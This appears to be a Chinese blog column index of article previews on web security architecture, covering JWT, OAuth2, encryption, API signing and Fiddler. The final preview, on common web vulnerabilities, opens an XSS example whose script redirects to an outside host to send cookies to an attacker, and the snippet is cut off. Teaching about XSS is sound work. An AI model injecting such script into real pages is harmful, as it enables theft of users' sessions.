互联网安全架构
关注
分享
扫一扫
文章平均质量分 85
安全,是一门学问。
流放深圳
让天下没有难写的代码
展开
专栏收录文章
- 默认排序
- 最新发布
- 最早发布
- 最多阅读
- 最少阅读
-
软件产品许可证书 Licence 全流程研发(使用非对称加密技术,既安全又简单)
我们需要考虑一个万全之策,既能做到系统的管控,又能做到后期的简单维护。那就是把控制逻辑嵌入到代码中。核心技术采用【非对称加密+拦截器】,旨在“让天下没有难写的代码”。原创 2024-04-14 19:18:21 · 3663 阅读 · 5 评论 -
Java 原生代码获取服务器的网卡 Mac 地址、CPU序列号、主板序列号
Java 可以获取服务器的网卡 Mac 地址、CPU 序列号、主板序列号等信息,用来做一些软件授权验证、设备管理等场景。原创 2024-04-14 01:03:57 · 906 阅读 · 0 评论 -
使用 Java 原生或 Hutool 工具包编写非对称加解密的工具类
可以使用公钥加密数据,然后使用私钥解密数据。也可以使用私钥加密数据,然后使用公钥解密数据。原创 2024-04-13 16:35:38 · 1680 阅读 · 0 评论 -
SpringBoot 整合 JWT 实现统一认证
JWT官网:https://jwt.io/introduction/参考:http://c.biancheng.net/view/5499.htmlJWT是什么?JWT(Json Web Token)是为了在网络应用环境间传递声明而执行的一种基于 Json 的开放标准。JWT 的声明一般被用来在身份提供者和服务提供者间传递被认证的用户身份信息,以便于从资源服务器获取资源。比如用在用户登录上时,基本思路就是用户提供用户名和密码给认证服务器,服务器验证用户提交信息的合法性;如果验证成功,会产原创 2021-06-25 20:41:19 · 671 阅读 · 0 评论 -
Nginx 反向代理、负载均衡配置、Location正则表达式
查看之前的博客可以点击顶部的【分类专栏】原创 2021-06-21 11:23:28 · 1131 阅读 · 7 评论 -
基于 Oauth2 搭建微服务 API 开放平台第 3 篇 —— 搭建资源服务 order-server(完结)
在上一篇博客基础上,我们继续搭建资源服务:https://blog.youkuaiyun.com/BiandanLoveyou/article/details/117593433application.xml 配置:server: port: 8081# 将SpringBoot项目作为单实例部署调试时,不需要注册到注册中心eureka: client: fetch-registry: false register-with-eureka: falsespring:...原创 2021-06-07 10:29:16 · 532 阅读 · 0 评论 -
基于 Oauth2 搭建微服务 API 开放平台第 2 篇 —— 搭建认证授权中心服务 oauth2-server
要搭建授权中心,我们先了解几个表。这是GitHub上面开发者提供的表结构地址:https://github.com/spring-projects/spring-security-oauth/blob/main/spring-security-oauth2/src/test/resources/schema.sql这是国人对表结构的解读地址:https://andaily.com/spring-oauth-server/db_table_description.html接下来,我们建表...原创 2021-06-06 15:50:55 · 1437 阅读 · 2 评论 -
基于 Oauth2 搭建微服务 API 开放平台第 1 篇 —— 了解 Oauth2
OK,根据系列博客我们已经学习了互联网的基本安全架构:https://blog.youkuaiyun.com/biandanloveyou/category_11074285.html接下来,我们开始搭建基于 Oauth2 的 API 开放平台。什么是 API 开放平台?在一些大型互联网公司,随着公司的业务发展逐渐庞大,需要和外部合伙伙伴进行合作,需要将公司的接口开放给外部其他合伙伙伴进行调用。比如腾讯的QQ互联网、微信开放平台、蚂蚁金服开放平台 、微博开放平台,比如实现功能QQ联合登陆、微信扫...原创 2021-06-06 15:50:26 · 1635 阅读 · 1 评论 -
系列学习互联网安全架构第 7 篇 —— HTTPS 传输协议
先看一篇文章:https://www.gworg.com/problems/988.html文章里提到哪些网站必须使用 https 协议:1、电商平台及其相关支付系统2、银行系统、金融机构等高私密性网站3、政府、高校、科研机构及其相关网站4、以搜索引擎为主要流量来源的网站5、以邮箱为主的企业交流平台什么是 HTTPS 传输协议?HTTPS (全称:Hyper Text Transfer Protocol over SecureSocket Layer),是以安...原创 2021-06-06 15:49:38 · 225 阅读 · 0 评论 -
系列学习互联网安全架构第 6 篇 —— Fiddler 抓包工具分析、篡改 Http 请求
什么是Http请求?HTTP协议是Hyper Text Transfer Protocol(超文本传输协议)的缩写,HTTP默认端口号为80,HTTP三点注意事项HTTP是无连接:无连接的含义是限制每次连接只处理一个请求。服务器处理完客户的请求,并收到客户的应答后,即断开连接。采用这种方式可以节省传输时间。 HTTP是媒体独立的:这意味着,只要客户端和服务器知道如何处理的数据内容,任何类型的数据都可以通过HTTP发送。客户端以及服务器指定使用适合的MIME-type内容类型。 HTTP是..原创 2021-06-06 15:49:23 · 764 阅读 · 0 评论 -
系列学习互联网安全架构第 5 篇 —— 信息加密技术(对称加密、非对称加密)
什么是对称加密?对称密码技术:发件人和收件人使用其共同拥有相同的单个密钥,这种密钥既用于加密,也用于解密,叫做机密密钥(也称为对称密钥或会话密钥)。能够提供信息机密性(没有密钥信息不能被解密)、完整性(被改变的信息不能被解密)的服务。对称式密码学又称:单钥密码学、秘密密钥密码学、会话密钥密码学、私钥密码学、共享秘钥密码学。常见的对称式加密技术DES(数据加密标准):分组式加密,算法源于Lucifer,作为NIST对称式加密标准;64位(有效位56位、校验8位),分组算法3D...原创 2021-06-06 15:48:58 · 971 阅读 · 0 评论 -
系列学习互联网安全架构第 8 篇 —— API 接口增加签名(验签)
通过学习之前的博客:API 接口安全设计:https://blog.youkuaiyun.com/BiandanLoveyou/article/details/117487626信息加密技术(对称加密、非对称加密):https://blog.youkuaiyun.com/BiandanLoveyou/article/details/117524716现在我们来讲解 API 接口增加签名的内容。不像网上讲解的那种那么难理解,不用那么复杂。如何保证 API 接口的安全性,一般来说,解决办法有以下几种:1、...原创 2021-06-06 15:49:46 · 1088 阅读 · 1 评论 -
系列学习互联网安全架构第 4 篇 —— API 接口安全设计(使用拦截器)
原创 2021-06-06 15:48:45 · 588 阅读 · 0 评论 -
系列学习互联网安全架构第 3 篇 —— 自定义注解,防止表单重复提交
原创 2021-06-06 15:48:37 · 195 阅读 · 0 评论 -
系列学习互联网安全架构第 2 篇 —— 防止表单重复提交方案(防止 API 接口幂等设计)
表单重复提交,是我们开发中经常遇到的一个问题。最简单的做法是让前端调用者去处理,但是一旦项目庞大,用户量增加的时候,或者网络延迟的情况,多次点击提交的情况,或者补偿重发接口等等,这种方式显然就不靠谱了。防止 API 接口幂等设计防止 API 接口幂等,就是为了解决 API 接口重复提交的问题。怎么设计呢?...原创 2021-06-06 15:48:28 · 648 阅读 · 0 评论 -
系列学习互联网安全架构第 1 篇 —— 常见 Web 安全漏洞以及应对策略
OK,本系列博客主要讲解互联网安全架构,包括互联网常见的漏洞分析以及如何防护。后续还有安全框架的学习。Web 安全常见的攻击手段XSS、SQL注入、盗取链接、CSRF、文件上传漏洞、DDOS攻击等什么是XSS攻击手段XSS攻击使用Javascript脚本注入进行攻击,例如在提交表单后,展示到另一个页面,可能会受到XSS脚本注入,读取本地cookie远程发送给黑客服务器端。比如:<script>window.location.href='http://www.he...原创 2021-06-06 15:48:17 · 542 阅读 · 0 评论